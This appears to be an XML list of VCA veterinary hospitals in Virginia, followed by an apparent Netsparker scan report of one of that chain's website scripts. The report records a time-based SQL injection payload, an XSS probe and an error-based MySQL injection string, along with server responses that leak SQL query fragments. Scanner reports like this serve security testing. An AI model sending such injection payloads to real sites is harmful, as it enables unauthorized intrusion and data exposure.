<?xml version="1.0" encoding="ISO-8859-1"?><markers><marker name="VCA Healthy PAWS Medical Center" address="14840 Washington Street, Haymarket, VA 20169" phone="703-754-4146" shortname="healthy-paws" distance="2398.24998884716" lat="38.810654" lng="-77.632892" /><marker name="VCA Chancellor Animal Hospital" address="11101 Gordon Road, Fredericksburg, VA 22407" phone="540-786-2282" shortname="chancellor" distance="2408.57401465928" lat="38.259782" lng="-77.583096" /><marker name="VCA University Veterinary Clinic" address="10681 Braddock Road, Fairfax, VA 22032" phone="703-385-1054" shortname="university-va" distance="2414.77611211473" lat="38.826928" lng="-77.315669" /><marker name="VCA West End Animal Hospital" address="3047 Lauderdale Dr., Richmond, VA 23233" phone="804-364-2801" shortname="west-end" distance="2415.22374272805" lat="37.638578" lng="-77.632404" /><marker name="VCA Annandale Animal Hospital" address="7405 Little River Turnpike, Annandale, VA 22003" phone="703-941-3100" shortname="annandale" distance="2420.79648403722" lat="38.831031" lng="-77.200522" /><marker name="VCA Pets First Animal Hospital" address="9201 Staples Mill Rd., Richmond, VA 23228" phone="804-672-3576" shortname="pets-first" distance="2421.37906483131" lat="37.641687" lng="-77.516085" /><marker name="VCA Total Care Animal Hospital" address="6506 W. Broad St., Richmond, VA 23230" phone="804-282-4215" shortname="total-care" distance="2422.17275101593" lat="37.598608" lng="-77.513729" /><marker name="VCA Barcroft Cat Hospital" address="6357 Columbia Pike, Falls Church, VA 22041" phone="703-941-2852" shortname="barcroft-cat" distance="2423.05494911975" lat="38.836506" lng="-77.156299" /><marker name="VCA Alexandria Animal Hospital" address="2660 Duke Street, Alexandria, VA 22314" phone="703-751-2022" shortname="alexandria" distance="2427.71383308406" lat="38.806337" lng="-77.075843" /><marker name="VCA Beacon Hill Cat Hospital" address="6610 Richmond Highway, Alexandria, VA 22306" phone="703-765-2287" shortname="beacon-hill" distance="2427.86446525968" lat="38.775083" lng="-77.081152" /><marker name="VCA Old Town Animal Hospital" address="425 North Henry Street, Alexandria, VA 22314" phone="703-549-3647" shortname="old-town" distance="2429.00785402607" lat="38.810090" lng="-77.050340" /><marker name="VCA Animal Care Associates" address="2403 Boulevard, Colonial Heights, VA 23834" phone="804-520-2273" shortname="animal-care-associates" distance="2433.27749049368" lat="37.270633" lng="-77.403029" /><marker name="VCA Herndon-Reston Animal Hospital" address="500 Elden Street, Herndon, VA 20170" phone="703-437-5655" shortname="herndon-reston" distance="2454.57737939133" lat="36.098320" lng="-77.378910" /><marker name="VCA Boulevard Animal Hospital" address="12620 Nettles Dr., Newport News, VA 23606" phone="757-874-3200" shortname="boulevard" distance="2484.73823865474" lat="37.085142" lng="-76.497693" /><marker name="VCA James River Animal Hospital" address="9804 Warwick Blvd, Newport News, VA 23601" phone="757-595-5505" shortname="james-river" distance="2487.97919582941" lat="37.026483" lng="-76.455553" /><marker name="VCA Airline Boulevard Animal Hospital" address="615 Airline Blvd, Portsmouth, VA 23707" phone="757-393-1011" shortname="airline-boulevard" distance="2497.4437131301" lat="36.833237" lng="-76.340309" /><marker name="VCA Animal Care Center" address="1228 West Little Creek Road, Norfolk, VA 23505" phone="757-423-3900" shortname="animal-care-center" distance="2498.41506589601" lat="36.916240" lng="-76.295544" /></markers>
Database Error Message

Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /tools/markers_sema.php

/tools/markers_sema.php

http://www.vcahospitals.com/tools/markers_sema.php?sema=%27;WAITFOR%20DELAY%20%270:0:25%27--

Parameters

Parameter Type Value
sema GET ';WAITFOR DELAY '0:0:25'--

Request

GET /tools/markers_sema.php?sema=%27;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=gnrb178du6ouqlhertfrhhq1v7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:51 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 217
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WAITFOR DELAY '0:0:25'--' AND i_emergency_only <> 1 ORDER BY distance' at line 24
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /tools/markers_sema.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000CE)%3C/script%3E

/tools/markers_sema.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000CE)%3C/script%3E CONFIRMED

http://www.vcahospitals.com/tools/markers_sema.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enets..

Parameters

Parameter Type Value
sema GET E13
URI-BASED Raw URI '"--></style></script><script>netsparker(0x0000CE)</script>

Request

GET /tools/markers_sema.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000CE)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=hcgpjokc2ihsutq552fv9m6k57
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Sat, 05 Mar 2011 12:50:04 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /tools/markers_sema.php'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0000CE)&lt;/script&gt;on this server.</p></body></html>
MySQL Database Identified

MySQL Database Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.

Impact

This issue is reported as additional information only, there is no direct impact arising from this issue.
- /tools/markers_sema.php

/tools/markers_sema.php CONFIRMED

http://www.vcahospitals.com/tools/markers_sema.php?sema='%2B(select+1+and+row(1%2c1)%3e(select+count..

Request

GET /tools/markers_sema.php?sema='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=hcgpjokc2ihsutq552fv9m6k57
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:00 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 51
Content-Type: text/html


Duplicate entry '_!@4dilemma:0' for key 'group_key'